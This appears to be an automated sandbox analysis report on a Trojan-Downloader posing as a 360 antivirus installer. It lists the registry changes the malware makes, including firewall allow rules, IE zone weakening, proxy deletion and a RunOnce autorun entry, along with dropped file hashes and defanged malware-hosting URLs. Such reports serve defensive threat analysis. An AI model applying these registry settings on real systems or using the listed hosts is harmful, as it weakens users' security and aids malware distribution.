[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1399978749"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 29 4B 29 2F E0 55 5D 1B 73 92 5A 05 6D 79 2C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Mnying]
"Mnying.exe" = "%Program Files%\Mnying\Mnying.exe:*:Enabled:ÃÀŮӪ"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Mnying]
"Mnying.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"

The process taskkill.exe:1896 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 41 DE 81 3B 8B 33 C3 70 BB 5B 32 F3 90 74 4B"

The process Ainqngz4.0.exe:2176 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "Ainqngz4.0.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\System\CurrentControlSet\Control\VIDEO\{93BE68F4-CC3D-47B9-A3E0-1521247A9D19}\0000]
"Attach.ToDesktop" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Ainqngz4.0.exe"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "Ainqngz4.0.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1398819844"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 06 62 85 14 D7 F8 70 F5 28 BC DE 77 DB 03 28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process -8670_360_MM.exe:1148 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"Publisher" = "meinvying Inc."

[HKCU\Software\mnsf]
"3" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Mnying]
"Mnyingfilename" = "Mnying.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"UninstallString" = "%Program Files%\Mnying\usst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Mnying]
"Mnyingfiledir" = "%Program Files%\Mnying"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"DisplayName" = "ÃÀŮӪ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"DisplayVersion" = ""

[HKCU\Software\Mnying]
"ci1" = "4294958626"
"ci2" = "360"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 D8 3A 13 D3 05 FB E9 B4 32 B2 A6 36 E2 7A AB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Mnying]
"(Default)" = "%Program Files%\Mnying\Mnying.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"DisplayIcon" = "%Program Files%\Mnying\Mnying.exe"

[HKLM\SOFTWARE\Mnying]
"UpdateVer" = "65537"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃÀŮӪ]
"URLInfoAbout" = ""

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process vcredist_x86.exe:1940 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 8F F3 9F 07 A8 68 46 5A 90 EA 3E B6 11 1B 0C"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process MsiExec.exe:3856 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 9E 65 3F C1 AB 0E 51 40 40 93 96 48 A9 49 81"

The process tjjrfx_70745.exe:456 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCR\metnsd\clsid]
"SequenceID" = "7E 67 AC 6C FC 63 AD 4A 92 74 A4 8C 9E B7 26 50"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi6.tmp]
"tha.exe" = "tha"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 19 6D 01 5B 00 6E 42 04 66 2D 5D 9F 0F E9 B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp]
"tha.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tha.exe:*:Enabled:百度卫士安装程序"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan-Downloader adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\kele]
"tjjrfx_70745.exe" = "%Program Files%\kele\tjjrfx_70745.exe:*:Enabled:百度卫士在线安装程序"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp]
"tha.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tha.exe:*:Enabled:百度卫士安装程序"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\kele]
"tjjrfx_70745.exe" = "%Program Files%\kele\tjjrfx_70745.exe:*:Enabled:百度卫士在线安装程序"

The process tha.exe:3316 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 4B 48 A0 4C 53 EF 9C 7F 93 4A 2D A1 A2 98 CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process fdcard.exe:2184 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 59 C0 C0 DB C1 81 17 0F C8 75 C3 ED BB 77 6E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process cacls.exe:1712 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 3E 8F DC BC EA DE D9 26 9B 00 AE F7 EB 6E 19"

Dropped PE files

MD5 File path
9fd685edcd84e63eafe96f72891c8738 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\BDLogicUtils.dll
d184763cb4e62d531193978de7b82db2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\BDMDownload.dll
6812edbc825d28224d79d3645c9bb0f6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\BDMNet.dll
928208161b61b8c36fa1a6095c1ccfab c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\BDMNetGetInfo.dll
30cbc602ada7cdfb0346038c05996d84 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\BDMReport.dll
b540a866191f7fd20f5e6355bc2b094e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\BDMSkin.dll
f52eb281e29da8065e18805617ac2cbc c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\System.dll
763b532d651f0ad5e135d9b57bf4fba4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\dl.dll
ebfe7c9594e300bb0c16e7bb99a7e66d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\hu.dll
4e283c503ef12d27b09deb52525fb1d1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi6.tmp\tmppm4bkx.dll
254f13dfd61c5b7d2119eb2550491e1d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp3.tmp\NSISdl.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp3.tmp\System.dll
3ea335b47cafbea9aa4032248b55c96c c:\Program Files\Mnying\Mnying.exe
cc988197515a5dbc32cd6f69f2aa9a35 c:\Program Files\Mnying\mvyy.exe
6ba93d04a90083d60ddd12a190affbe1 c:\Program Files\Mnying\usst.exe
63f99e772cd200979bceb8f9a2282c42 c:\Program Files\ainqngz4.0\Ainqngz4.0.exe
c05518efbd2694634bf168bc9925019d c:\Program Files\ainqngz4.0\Dcsvr.exe
0abfebdd43eed3834efe9b593a53e3a1 c:\Program Files\ainqngz4.0\fdcard.exe
a6cf588a4a4f1614565e8501daf5034a c:\Program Files\ainqngz4.0\uninstall.exe
089ad6707a93ff58186376d0d9eeae85 c:\Program Files\kele\-8670_360_MM.exe
deb2a82c1f082c4e0aec80948ec9f8ea c:\Program Files\kele\pczh_107_306.exe
a5b49ca5186d2eac47ae7095a07659ca c:\Program Files\kele\tjjrfx_70745.exe
59c3f630e4a2bedcd583ac0b2ecbe14b c:\Program Files\kele\yunboplayer.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: 360.cn
Product Name: ${PRODUCT_NAME}
Product Version: 2014.06.11.175618
Legal Copyright:
Legal Trademarks:
Original Filename: 360sd.exe
Internal Name: 360sd.exe
File Version: 2014.06.11.175618
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23488 23552 4.48909 7ebfade271f75cb4c180603ab653af42
.rdata 28672 4496 4608 3.59139 9d6e96915262c9d1129a16fa0b02a19a
.data 36864 110456 1024 3.27356 dbf10679c897d0edeee280fffdad552f
.ndata 147456 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 188416 26512 26624 2.7362 0a1129705227bbc09af9137a82b6cfbd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
1d1995bc145791ad2574e47692a7cc2f

URLs

URL IP
hxxp://pps.adsbw.cn/app.txt 61.147.113.66
hxxp://pps.adsbw.cn/goodpic_dae_619.zip 61.147.113.66
hxxp://c01.i07.arnic.hadns.net/0403/help1.html
hxxp://pxsw.n.shifen.com/
hxxp://web.mny8.com/json/btns1/btns.js 123.157.215.219
hxxp://web.mny8.com/json/task/task.js 123.157.215.219
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/1.png
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/2.png
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/4.png
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/3.png
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/7.png
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/6.png
hxxp://image.anbangjiance.com/play/meinvyingimg/btnIcon/5.png
hxxp://bcs.jomodns.com/sw-search-shadu/client/dllv4/BDMReport.dll
hxxp://dx5.3525.com/tj.php?mac=000C2902CDFB&st=1&exez=pczh_107_306.exe&exef=%original file name%.exe&pass=44683dff641394194c05e3f3ca584214&url1=hxxp://ya.ru/&url2=ya
hxxp://c01.i07.arnic.hadns.net/up_17.html?06132028
hxxp://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960 14.33.133.118
hxxp://c01.i07.arnic.hadns.net/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
hxxp://sxcdn.kukuplay.com/support/mini/fyminiloader-min.js
hxxp://dx5.3525.com/xin/?ver=138
hxxp://c.split.cnzz.com/stat.php?id=2701879&web_id=2701879
hxxp://dft.nc.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
hxxp://www.mnh.quzhao.com/x/mnh/mini/q428/8.css 14.33.133.118
hxxp://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html 14.33.133.118
hxxp://z10.cnzz.com/stat.htm?id=2701879&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=2120480958-1402680527-&showp=1276x846&st=0&sin=&t=&rnd=403236780
hxxp://www.mnh.quzhao.com/x/mnh/mini/q428/css_mini.css 14.33.133.118
hxxp://c.split.cnzz.com/core.php?web_id=2701879&t=z
hxxp://cpro.e.shifen.com/cpro/ui/c.js
hxxp://1st.xdwscache.glb0.lxdns.com/livevideo/v3.11.67/styles/new_common.css
hxxp://1st.xdwscache.glb0.lxdns.com/livevideo/v3.11.67/styles/mini.css
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=1611555924
hxxp://1st.xdwscache.glb0.lxdns.com/livevideo/v3.11.67/images/mini/bg.jpg
hxxp://1st.xdwscache.glb0.lxdns.com/livevideo/v3.11.67/images/mini/mini.png
hxxp://img.liufen.com/auto/images/nav_bg.gif 114.112.163.11
hxxp://pcookie.split.cnzz.com/app.gif?&cna=0SIiDDGXogwCAcGK9Odn lhy
hxxp://1st.xdwscache.glb0.lxdns.com/common/scripts/jquery-1.8.3.min.js
hxxp://1st.xdwscache.glb0.lxdns.com/livevideo/v3.11.67/scripts/new_box.js
hxxp://1st.xdwscache.glb0.lxdns.com/livevideo/v3.11.67/scripts/mini.js
hxxp://1st.xdwscache.glb0.lxdns.com/common/scripts/DD_belatedPNG_0.0.8a-min.js
